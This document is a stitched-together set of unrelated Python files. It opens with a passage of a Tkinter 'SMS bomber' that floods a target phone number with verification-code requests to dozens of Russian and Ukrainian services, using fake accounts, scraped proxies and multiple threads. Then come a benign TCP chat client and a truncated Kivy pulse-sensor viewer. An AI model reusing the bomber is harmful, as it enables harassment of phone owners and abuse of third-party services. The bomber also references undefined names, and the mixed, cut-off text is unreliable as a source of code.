1)].split(' ')[1]} return proxies _name = '' for x in range(12): _name = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) password = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) username = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) _email = _name + '@gmail.com' email = _name + '@gmail.com' _phone = phone _phone9 = _phone[1:] _phoneAresBank = '+' + _phone[0] + '(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _phone9dostavista = _phone9[:3] + '+' + _phone9[3:6] + '-' + _phone9[6:8] + '-' + _phone9[8:10] _phoneOstin = '+' + _phone[0] + '+(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _phonePizzahut = '+' + _phone[0] + ' (' + _phone[1:4] + ') ' + _phone[4:7] + ' ' + _phone[7:9] + ' ' + _phone[9:11] _phoneGorzdrav = _phone[1:4] + ') ' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _text = 'Ляля' phone1 = '+' + phone[0] + ' ' + '(' + phone[1] + phone[2] + phone[3] + ')' + ' ' + phone[4] + phone[5] + phone[6] + '-' + phone[7] + phone[8] + '-' + phone[9] + phone[10] phone2 = phone[1] + phone[2] + phone[3] + phone[4] + phone[5] + phone[6] + phone[7] + phone[8] + phone[9] + phone[10] try: requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': _phone}, headers={}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://oauth.sovest.ru/oauth/authorize', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://gorzdrav.org/login/register/sms/send', data={'phone': _phone9}, proxies=(proxy())) good() except Exception as e: error() try: requests.get(('https://www.sportmaster.ru/user/session/sendSmsCode.do?phone=+' + _phone + '&_=1580559110407'), proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://ctx.playfamily.ru/screenapi/v3/sendsmscode/web/1', 
data={'phone':_phone, 'password':password}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://my.pozvonim.com/api/v1/auth/send/sms', data={'phone':_phone, 'origin':'https://my.pozvonim.com', 'referer':'https://my.pozvonim.com/register/', 'host':'my.pozvonim.com'}, proxies=(proxy())) good() except Exception as e: error() try: requests.get(('https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper?oper=9&callmode=1&phone=' + _phone), data={'host':'register.sipnet.ru', 'origin':'https://www.sipnet.ru', 'referer':'https://www.sipnet.ru/register'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber':_phone, 'countryCode':'ID', 'name':'test', 'email':'mail@mail.com', 'deviceToken':'*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.rabota.ru/remind', data={'credential': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_name, 'phone':_phone, 'promo':'yellowforma'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCodeForOtp', params={'pageName':'loginByUserPhoneVerification', 'fromCheckout':'false', 'fromRegisterPage':'true', 'snLogin':'', 'bpg':'', 'snProviderId':''}, data={'phone':'+7 915 3509908', 'g-recaptcha-response':'', 'recaptcha':'on'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://newnext.ru/graphql', 
json={'operationName':'registration', 'variables':{'client': {'firstName':'Иван', 'lastName':'Иванов', 'phone':_phone, 'typeKeys':['Unemployed']}}, 'query':'mutation registration($client: ClientInput!) {\n registration(client: $client) {\n token\n __typename\n }\n}\n'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/', json={'client_type':'personal', 'email':_email, 'mobile_phone':_phone, 'deliveryOption':'sms'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc':'2.0', 'protocol':'5', 'method':'Пользователь.ЗаявкаНаФизика', 'params':{'phone': _phone}, 'id':'1'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': '+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://cloud.mail.ru/api/v2/notify/applink', json={'phone':'+' + _phone, 'api':2, 'email':'email', 'x-email':'x-email'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone', data={'st.r.phone': '+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://plink.tech/register/', json={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('http://smsgorod.ru/sendsms.php', data={'number': _phone}, proxies=(proxy())) good() except Exception as e: error() try: 
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://passport.twitch.tv/register?trusted_request=true', json={'birthday':{'day':15, 'month':12, 'year':1997}, 'client_id':'kd1unb4b3q4t58fwlpcbzcbnm76a8fp', 'include_verification_code':True, 'password':password, 'phone_number':_phone, 'username':username}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://cabinet.wi-fi.ru/api/auth/by-sms', data={'msisdn': _phone}, headers={'App-ID': 'cabinet'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://eda.yandex/api/v1/user/request_authentication_code', json={'phone_number': '+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api-prime.anytime.global/api/v2/auth/sendVerificationCode', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.delivery-club.ru/ajax/user_otp', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', json={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://youdo.com/api/verification/sendverificationcode/', data={'PhoneE164': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post(('https://www.citilink.ru/registration/confirm/phone/+' + _phone + '/'), proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://tehnosvit.ua/iwantring_feedback.html', data={'feedbackName':_name, 'feedbackPhone':'+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://mobileplanet.ua/register', data={'klient_name':_name, 'klient_phone':'+' + _phone, 'klient_email':_email}, proxies=(proxy())) good() except Exception 
as e: error() try: requests.post('https://protovar.com.ua/aj_record', data={'object':'callback', 'user_name':_name, 'contact_phone':_phone[3:]}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://e-vse.online/mail2.php', data={'telephone': '+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main&currentLocale=uk_UA', data={'firstname':_name, 'telephone':_phone[2:], 'email':_email, 'password':password, 'form_key':'Zqqj7CyjkKG2ImM8'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post(('https://secure.online.ua/ajax/check_phone/?reg_phone=%2B' + _phone[0:7] + '-' + _phone[8:11]), proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://707taxi.com.ua/sendSMS.php', data={'tel': _phone[3:]}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}, proxies=(proxy())) good() except Exception as e: error() try: requests.post(f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone={_phone}", data={'result': 'ok'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://my.citrus.ua/api/v2/register', data={'email':_email, 'name':_name, 'phone':_phone[2:], 'password':'fgfg', 'confirm_password':'fgfg'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.nl.ua', data={'component':'bxmaker.authuserphone.login', 'sessid':'bf70db951f54b837748f69b75a61deb4', 'method':'sendCode', 'phone':_phone, 'registration':'N'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone}, proxies=(proxy())) good() except Exception as e: error() try: 
requests.post('https://api.tinkoff.ru/v1/sign_up', data={'phone': '+' + phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.mtstv.ru/v1/users', data={'msisdn': phone}, proxies=(proxy())) good() except Exception as e: error() try: a = requests.get('https://driver.gett.ru/signup/', proxies=(proxy())) requests.post('https://driver.gett.ru/api/login/phone/', data={'phone':phone, 'registration':'true'}, headers={'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'csrftoken=' + a.cookies['csrftoken'] + '; _ym_uid=1547234164718090157; _ym_d=1547234164; _ga=GA1.2.2109386105.1547234165; _ym_visorc_46241784=w; _gid=GA1.2.1423572947.1548099517; _gat_gtag_UA_107450310_1=1; _ym_isad=2', 'Host':'driver.gett.ru', 'Referer':'https://driver.gett.ru/signup/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-CSRFToken':a.cookies['csrftoken']}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.ivi.ru/mobileapi/user/register/phone/v6/', data={'phone': phone}, headers={'Accept-Language':'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'Connection':'keep-alive', 'Host':'api.ivi.ru', 'origin':'https://www.ivi.ru/', 'Referer':'https://www.ivi.ru/profile'}, proxies=(proxy())) good() except Exception as e: error() try: b = requests.session() b.get('https://drugvokrug.ru/siteActions/processSms.htm', proxies=(proxy())) requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone}, headers={'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'JSESSIONID=' + b.cookies['JSESSIONID'] + ';', 'Host':'drugvokrug.ru', 'Referer':'https://drugvokrug.ru/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-Requested-With':'XMLHttpRequest'}, proxies=(proxy())) good() except Exception as e: error() try: rutaxi = 
requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': phone[1:]}, proxies=(proxy())) good() except Exception as e: error() try: rutube = requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + phone}, proxies=(proxy())) good() except Exception as e: error() try: psbank = requests.post('https://ib.psbank.ru/api/authentication/extendedClientAuthRequest', json={'firstName':'Иван', 'middleName':'Иванович', 'lastName':'Иванов', 'sex':'1', 'birthDate':'10.10.2000', 'mobilePhone':phone[1:], 'russianFederationResident':'true', 'isDSA':'false', 'personalDataProcessingAgreement':'true', 'bKIRequestAgreement':'null', 'promotionAgreement':'true'}, proxies=(proxy())) good() except Exception as e: error() try: beltelecom = requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone}, proxies=(proxy())) good() except Exception as e: error() try: modulbank = requests.post('https://my.modulbank.ru/api/v2/registration/nameAndPhone', json={'FirstName':'Саша', 'CellPhone':phone[1:], 'Package':'optimal'}, proxies=(proxy())) good() except Exception as e: error() try: data = {'form[NAME]':'Иван', 'form[PERSONAL_GENDER]':'M', 'form[PERSONAL_BIRTHDAY]':'11.02.2000', 'form[EMAIL]':'fbhbdfvbd@gmail.com', 'form[LOGIN]':phone1, 'form[PASSWORD]':None, 'get-new-password':'Получите пароль по SMS', 'user_agreement':'on', 'personal_data_agreement':'on', 'formType':'full', 'utc_offset':180} aptkru = requests.post('https://apteka.ru/_action/auth/getForm/', data=data, proxies=(proxy())) good() except Exception as e: error() try: tvzavr = requests.post(('https://www.tvzavr.ru/api/3.1/sms/send_confirm_code?plf=tvz&phone=' + phone + '&csrf_value=a222ba2a464543f5ac6ad097b1e92a49'), proxies=(proxy())) good() except Exception as e: error() try: cook = requests.post('https://www.netprint.ru/order/profile', proxies=(proxy())) headers = {'Accept':'application/json, text/javascript, */*; q=0.01', 'Accept-Encoding':'gzip, deflate, 
br', 'Accept-Language':'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7', 'Connection':'keep-alive', 'Content-Length':145, 'Cookie':'unbi=' + cook.cookies['unbi'], 'Host':'www.netprint.ru', 'Origin':'https://www.netprint.ru', 'Referer':'https://www.netprint.ru/order/profile', 'Sec-Fetch-Mode':'cors', 'Sec-Fetch-Site':'same-origin', 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 OPR/65.0.3467.48', 'X-Requested-With':'XMLHttpRequest'} netprint = requests.post('https://www.netprint.ru/order/social-auth', headers=headers, data={'operation':'stdreg', 'email_or_phone':phonew, 'i_agree_with_terms':1}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('http://youdrive.today/login/web/phone', data={'phone':phone, 'phone_code':7}, proxies=(proxy())) good() except Exception as e: error() try: requests.get(('https://www.oyorooms.com/api/pwa/generateotp?phone=' + phone + '&country_code=%2B7&nod=4&locale=en'), proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.carsmile.com/', json={'operationName':'enterPhone', 'variables':{'phone': phone}, 'query':'mutation enterPhone($phone: String!) 
{\n enterPhone(phone: $phone)\n}\n'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.delitime.ru/api/v2/signup', data={'SignupForm[username]':phone, 'SignupForm[device_type]':3}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php', data={'msisdn':phone, 'locale':'en', 'countryCode':'ru', 'version':'1', 'k':'ic1rtwz1s1Hj1O0r', 'r':'46763'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://terra-1.indriverapp.com/api/authorization?locale=ru', data={'mode':'request', 'phone':'+' + phone, 'phone_permission':'unknown', 'stream_id':0, 'v':3, 'appversion':'3.20.6', 'osversion':'unknown', 'devicemodel':'unknown'}, proxies=(proxy())) good() except Exception as e: error() try: password = ''.join(random.choice(string.ascii_letters) for _ in range(6)) requests.post('https://lk.invitro.ru/sp/mobileApi/createUserByPassword', data={'password':password, 'application':'lkp', 'login':'+' + phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', json={'phone': phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.get(('https://findclone.ru/register?phone=+' + phone), proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://mobile.vkusvill.ru:40113/api/user/', data={'Phone_number':_phone9, 'version':'2'}, headers={}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('http://taxiseven.ru/auth/register', data={'phone': _phone}, headers={}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://security.wildberries.ru/mobile/requestconfirmcode?forAction=RegisterUser', data={'phone': '+' + _phone}, headers={}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.rabota.ru/remind', data={'credential': 
_phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://fastmoney.ru/auth/registration', data={'RegistrationForm[username]':'+' + _phone, 'RegistrationForm[password]':'12345', 'RegistrationForm[confirmPassword]':'12345', 'yt0':'Регистрация'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://ube.pmsm.org.ru/esb/iqos-reg/submission', json={'data': {'firstName':_text, 'lastName':'***', 'phone':_phone, 'email':_name + '@gmail.com', 'password':_name, 'passwordConfirm':_name}}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_text, 'phone':_phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://login.mos.ru/sps/recovery/start', json={'login':_phone, 'attr':''}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}, proxies=(proxy())) good() except Exception as e: error() class Queue: def __init__(self): self.queue = [] def get(self): if self.qsize() != 0: return self.queue.pop() def put(self, item): if item not in self.queue: self.queue.append(item) def qsize(self): return len(self.queue) def __str__(self): return str(self.queue) class Proxy: def __init__(self): self.anony_proxis = 'https://free-proxy-list.net/anonymous-proxy.html' self.new_proxies = 'https://free-proxy-list.net' self.socks_proxies = 'https://socks-proxy.net' self.ssl_proxies = 'https://sslproxies.org' self.qproxy = None self.psize = 0 self.country = None self.port = None def fetch(self, url): proxies = bs(get(url).text, 
'html.parser').find('tbody').findAll('tr') for proxy in proxies: pjson = self.parse(proxy.findAll('td')) if pjson: if self.psize: if self.qproxy.qsize() < self.psize: self.qproxy.put(pjson) else: break else: self.qproxy.put(pjson) def parse(self, proxy): pjson = {'ip':proxy[0].string, 'port':proxy[1].string, 'anonymity':proxy[4].string, 'country':proxy[3].string, 'updated':proxy[7].string, 'https':proxy[6].string} if all([self.country, self.port]): if pjson['country'] == self.country: if pjson['port'] == self.port: return pjson elif self.port: if self.port != pjson['port']: return return pjson elif self.country: if self.country != pjson['country']: return return pjson else: return pjson def scrape(self, size=None, port=None, country=None, new_proxies=False, anony_proxies=False, socks_proxies=False, ssl_proxies=False): self.port = str(port) if port else None self.country = country self.qproxy = Queue() self.psize = size if new_proxies: self.fetch(self.new_proxies) if anony_proxies: self.fetch(self.anony_proxies) if socks_proxies: self.fetch(self.socks_proxies) if ssl_proxies: self.fetch(self.ssl_proxies) proxies = self.qproxy self.qproxy = Queue() return proxies def download(): prx = Proxy() proxies = prx.scrape(new_proxies=True, size=10) f = open('proxy.txt', 'w') while 1: if proxies.qsize(): proxy = proxies.get() f.write('http socks5://' + proxy['ip'] + ':' + proxy['port'] + '\n') f.close() messagebox.showinfo(title='Proxy загружены', message=('Путь к файлу: ' + os.path.dirname(os.path.abspath(__file__)) + '\\proxy.txt')) var = IntVar() check = Checkbutton(root, text='Использовать PROXY', variable=var, onvalue=1, offvalue=0) check.pack() check.place(x=350, y=50) def StartThread(): number = text1.get('1.0', 'end') try: thrade = int(text2.get('1.0', 'end')) except: messagebox.showinfo(title='Warning', message='Не корректный формат потоков') try: if thrade > 20: messagebox.showinfo(title='Warning', message='Слишком большое количество потоков') except: pass if 
var.get() == 1: spam = spamProxy try: if file_name == None: pass except: messagebox.showinfo(title='Warning', message='Не указан файл с proxy') try: if len(number) < 12 or file_name == None: messagebox.showinfo(title='Warning', message='Недостаточно цифр') else: messagebox.showinfo(title='GOOD', message='Спам запущен') for i in range(thrade): t = threading.Thread(target=spam, args=(number,)) t.start() except: pass else: spam = spamNOproxy if len(number) < 12: messagebox.showinfo(title='Warning', message='Недостаточно цифр') else: messagebox.showinfo(title='GOOD', message='Спам запущен') for i in range(thrade): t = threading.Thread(target=spam, args=(number,)) t.start() def fileopen(): global file_name file_name = fd.askopenfilename(filetypes=(('TXT files', '*.txt'), ('HTML files', '*.html;*.htm'), ('All files', '*.*'))) root.resizable(False, False) text1 = Text(root, height=1, width=15, font='Arial 14') text1.pack() text1.place(x=15, y=25) text2 = Text(root, height=1, width=2, font='Arial 14') text2.pack() text2.place(x=15, y=85) file = Button(text='Выбрать файл с proxy', command=fileopen) file.pack() file.place(x=15, y=120) file = Button(text='Загрузить proxy из интернета', command=download) file.pack() file.place(x=15, y=160) label1 = Label(text='Введите номер в формате 7XXXXXXXXXX', fg='#912700', bg='#849187') label1.pack() label1.place(x=15, y=55) label2 = Label(text='Потоки (не больше 20)', fg='#912700', bg='#849187') label2.pack() label2.place(x=50, y=90) crack = Button(text='Старт', height=2, width=12, background='green', command=StartThread) crack.pack() crack.place(x=215, y=235) root.mainloop()
client.py
#!/bin/python
# DEVELOPED BY DEVILMASTER
"""Simple TCP chat-room client.

Connects to a chat server on 127.0.0.1:4444, answers the server's
NICKNAME handshake, then runs two threads: one printing incoming
messages, one sending stdin lines tagged with the chosen nickname.
"""
import sys, time, socket, threading, os

os.system('clear')


class colors:
    """ANSI escape codes used to colorize terminal output."""
    blue = '\033[94m'
    cyan = '\033[96m'
    green = '\033[92m'
    red = '\033[31m'
    pink = '\033[35m'


banner = colors.cyan + """
   _______ _____ ______ ___ ____ ____ __ ___
  / ___/ // / _ /_ __/___/ _ \\/ __ \\/ __ \\/ |/ /
 / /__/ _ / __ |/ / /___/ , _/ /_/ / /_/ / /|_/ /
 \\___/_//_/_/ |_/_/ /_/|_|\\____/\\____/_/ /_/

 [*] CHAT-ROOM - A SIMPLE CHAT SERVER [*]
 [*] DEVELOPED BY DEVIL MASTER        [*]
"""


def slowprint(s):
    """Print *s* one character at a time (typewriter effect, 10 chars/s)."""
    for c in s + '\n':
        sys.stdout.write(c)
        sys.stdout.flush()
        time.sleep(1 / 10)


print(banner)
slowprint(colors.pink + "[CONNECTING] Connecting to server...")
slowprint(colors.green + "[CONNECTED] Connected to server...")
nickname = input(colors.blue + "[+] Enter your username : ")

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = '127.0.0.1'
port = 4444
client.connect((server, port))


def receive():
    """Background loop: print incoming messages; answer the NICKNAME probe."""
    while True:
        try:
            message = client.recv(1024).decode('ascii')
            if message == 'NICKNAME':
                # Server asks for our nickname once on connect.
                client.send(nickname.encode('ascii'))
            else:
                print(message)
        except Exception:
            # BUG FIX: original referenced the undefined name `bcolor`,
            # which raised a NameError inside this handler; the color
            # table in this file is called `colors`.
            slowprint(colors.red + "[ERROR] An error occured!")
            client.close()
            break


def write():
    """Read stdin lines forever and send them tagged with the nickname."""
    while True:
        message = '[{}] >> {}'.format(nickname, input(''))
        client.send(message.encode('ascii'))


receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
kivy_pulsesensor_viewer_demo.py
''' This example uses a Kivy Garden Graph package to draw Arduino pulse sensor data on a PC/phone screen. We use PySerial(PC) or usbserial4a(Android) to receive pulse sensor data from an Arduino board. To read more about this demo, visit: https://github.com/EveryWhereLab/kivy-pulsesensor-viewer-demo/. ''' import kivy kivy.require('1.8.0') from kivy.app import App from kivy.properties import ObjectProperty from kivy.uix.boxlayout import BoxLayout from kivy.uix.recycleboxlayout import RecycleBoxLayout from kivy.uix.popup import Popup from kivy.clock import Clock from kivy.utils import platform from kivy.properties import BooleanProperty from kivy.uix.label import Label from kivy.uix.recycleview import RecycleView from kivy.uix.recycleview.views import RecycleDataViewBehavior from kivy.uix.behaviors import FocusBehavior from kivy.uix.recycleview.layout import LayoutSelectionBehavior from kivy.uix.button import Button from plyer import orientation from queue import Queue import threading import re import time if platform == 'android': from usb4a import usb from usbserial4a import serial4a from usbserial4a import cdcacmserial4a else: from serial.tools import list_ports from serial import Serial, SerialException from kivy.garden.graph import Graph, MeshLinePlot from kivy.uix.popup import Popup from kivy.properties import ListProperty, StringProperty, ObjectProperty class SelectableRecycleBoxLayout(FocusBehavior, LayoutSelectionBehavior, RecycleBoxLayout): ''' Adds selection and focus behaviour to the view. 
''' class SelectableLabel(RecycleDataViewBehavior, Label): ''' Add selection support to the Label ''' index = None selected = BooleanProperty(False) selectable = BooleanProperty(True) def refresh_view_attrs(self, rv, index, data): ''' Catch and handle the view changes ''' self.index = index return super(SelectableLabel, self).refresh_view_attrs( rv, index, data) def on_touch_down(self, touch): ''' Add selection on touch down ''' if super(SelectableLabel, self).on_touch_down(touch): return True if self.collide_point(*touch.pos) and self.selectable: return self.parent.select_with_touch(self.index, touch) def apply_selection(self, rv, index, is_selected): ''' Respond to the selection of items in the view. ''' self.selected = is_selected if is_selected: print("selection changed to {0}".format(rv.data[index])) rv.selectedItem = index else: print("selection removed for {0}".format(rv.data[index])) class RV(RecycleView): def __init__(self, **kwargs): super(RV, self).__init__(**kwargs) self.selectedItem = -1 self.device_name_list=[] def append_item(self, x) : self.device_name_list.append(x[0]) self.data.append({'text': str(x[1])}) def set_first_item_as_default(self): if len(self.data) > 0: self.selectedItem = 0 if len(self.view_adapter.views) > 0: self.view_adapter.views[self.selectedItem].selected = 1 def get_first_selected_device_name(self): if self.selectedItem in range(len(self.device_name_list)): return self.device_name_list[self.selectedItem] return None def clearAll(self): self.device_name_list.clear() self.selectedItem = -1 self.view_adapter.views.clear() self.data.clear() class PulseSensorViewerDemo(BoxLayout): def __init__(self): orientation.set_landscape() self.rx_temp_data = "" self.points = [(0,0)] self.samples = Queue(300) self.serial_port = None self.read_thread = None self.port_thread_lock = threading.Lock() super(PulseSensorViewerDemo, self).__init__() self.reading_thread_enabled = False self.is_asking_permission = False self.graph = self.ids.graph_plot 
self.plot = [] self.plot.append(MeshLinePlot(color=[1, 1, 0, 1])) # - Yellow self.reset_plots() for plot in self.plot: self.graph.add_plot(plot) self.do_schedule_scan_once() def reset_plots(self): for plot in self.plot: plot.points = [(0, 0)] self.counter = 1 def do_start_stop_toggle(self): if not self.reading_thread_enabled: # to open the serial port, start a reading thread, and schedule a drawing timer selected_device = self.ids.device_list.get_first_selected_device_name() if selected_device is not None: try: if platform == 'android': device = usb.get_usb_device(selected_device) if not device: raise SerialException( "Device {} not present!".format(selected_device) ) if not usb.has_usb_permission(device): if self.is_asking_permission != True: self.is_asking_permission = True usb.request_usb_permission(device) Clock.schedule_once(lambda dt: self.do_start_stop_toggle(),0.5) return self.is_asking_permission = False self.serial_port = serial4a.get_serial_port( selected_device, App.get_running_app().config.getint('communication', 'baud_rate'), App.get_running_app().config.getint('communication', 'data_bits'), App.get_running_app().config.get('communication', 'parity'), float(App.get_running_app().config.get('communication', 'stop_bits')), timeout=1 ) else: self.serial_port = Serial( selected_device, App.get_running_app().config.getint('communication', 'baud_rate'), App.get_running_app().config.getint('communication', 'data_bits'), App.get_running_app().config.get('communication', 'parity'), float(App.get_running_app().config.get('communication', 'stop_bits')), timeout=1 ) except SerialException: self.popup_a_notification("The selected device can not be configured.\r\nPlease check the permissions and close me!") if self.serial_port is not None and self.serial_port.is_open and not self.read_thread: self.serial_port.reset_input_buffer() self.read_thread = threading.Thread(target = self.read_serial_msg_thread) self.reading_thread_enabled = True self.read_thread.start() # 
Since there is a queue to adjust inconsistent throughputs, we can set a small time interval to check if sampes exist in queue . Clock.schedule_interval(self.draw_waveform, 1 / 50.) self.ids.toggle_button.text = "Stop acquisition" else: self.popup_a_notification("No device selected. Close me!") else: # to unschedule the drawing timer and stop the reading thread self.reset_plots() Clock.unschedule(self.draw_waveform) self.reading_thread_enabled = False with self.port_thread_lock: self.serial_port.close() self.read_thread.join() self.read_thread = None self.ids.toggle_button.text = "Start acquisition" def popup_a_notification(self, msg): # create content and add to the popup content = Button(text=msg) popup = Popup(title='Reminder', content=content, auto_dismiss=False) # bind the on_press event of the button to the dismiss function content.bind(on_press=popup.dismiss) # open the popup popup.open() def do_schedule_scan_once(self): Clock.schedule_once(self.scan_usb_devices,1/10) def scan_usb_devices(self,dt): self.ids.device_list.clearAll() device_node_list = [] r = lambda x: x if x is not None else '' if platform == 'android': usb_device_list = usb.get_usb_device_list() device_node_list = [ (device.getDeviceName(), r(device.getProductName()) + "(vid=" + str(device.getVendorId()) + ",pid=" + str(device.getProductId()) + ")" ) for device in usb_device_list ] else: usb_device_list = list_ports.comports() device_node_list = [(device.device, r(device.product) + "(vid=" + str(device.vid) + ",pid=" + str(device.pid) + ")") for device in usb_device_list] if len(device_node_list) > 0: for device in device_node_list: self.ids.device_list.append_item(device) Clock.schedule_once(self.set_first_item_as_default,1/10) def set_first_item_as_default(self, dt): self.ids.device_list.set_first_item_as_default() def draw_waveform(self,dt): update_size = self.samples.qsize() if update_size == 0: return if update_size > 200: # Just show latest samples. 
while(self.samples.qsize() > 200): self.samples.get() self.plot[0].points.clear() update_size = 200 self.counter = 0 else: old_samples_to_remove = self.counter + update_size - 200 if old_samples_to_remove > 0: # We re-write our points list if number of values exceed 200. # ie. Move each timestamp to the left. # We re-write our points list if number of values exceed 200. # ie. Move each timestamp to the left. for plot in self.plot: del(plot.points[0: old_samples_to_remove-1]) plot.points[:] = [(i[0] - old_samples_to_remove, i[1]) for i in plot.points[:]] self.counter = 200 - old_samples_to_remove points = [] for i in range(update_size): points.append((self.counter + i, int(self.samples.get()))) self.plot[0].points.extend(points) self.counter += update_size def get_lines(self, data): lines = [] self.rx_temp_data += data.decode("ascii") idx = self.rx_temp_data.rfind('\r\n') if idx > 0: lines = re.split(r'[\n\r]+', self.rx_temp_data) if idx == len(self.rx_temp_data): self.rx_temp_data = "" else: self.rx_temp_data = self.rx_temp_data[idx + 2:] return lines def read_serial_msg_thread(self): while self.reading_thread_enabled == True: try: with self.port_thread_lock: 